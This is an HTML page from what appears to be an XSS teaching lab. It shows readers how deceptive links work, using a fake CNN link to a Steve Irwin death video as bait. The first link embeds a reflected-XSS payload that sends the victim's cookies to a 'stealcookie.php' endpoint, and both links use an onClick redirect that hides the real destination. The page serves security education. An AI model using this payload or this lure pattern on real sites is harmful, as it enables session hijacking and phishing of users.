<html>
 <head>
  <h2>This page has malicious links</h2>
 </head>
 <body>
<script language="javascript" type="text/javascript">
function redirect(URL)
{
   document.location=URL;
   return false;
}
</script>
<ol>
<li>
First look at this one. This link's text and the actual link behind it are different. You can notice that by hovering the mouse on the link and noting the actual referral location on the status bar.
<br />
<a href="http://www.xsslab.com/setgetcookie.htm?username=<script>document.location.replace('http://www.xsslab.com/stealcookie.php?username='+document.cookie)</script>"  onClick="return redirect('http://www.xsslab.com/redirectpage.htm')">Video footage of Steve Irwin's death available on CNN</a>
 </li>

 <li>
 Now look at this one. Hovering the mouse over the link and checking the status bar won't work on this one because JavaScript can be used to redirect the link!<br />

<a href="http://www.cnn.com/2006/breakingnews/06/10/steveirwin.wmv" onClick="return redirect('http://www.xsslab.com/redirectpage.htm')">Video footage of Steve Irwin's death available on CNN</a>
 </li>
</ol>
 </body>
</html>
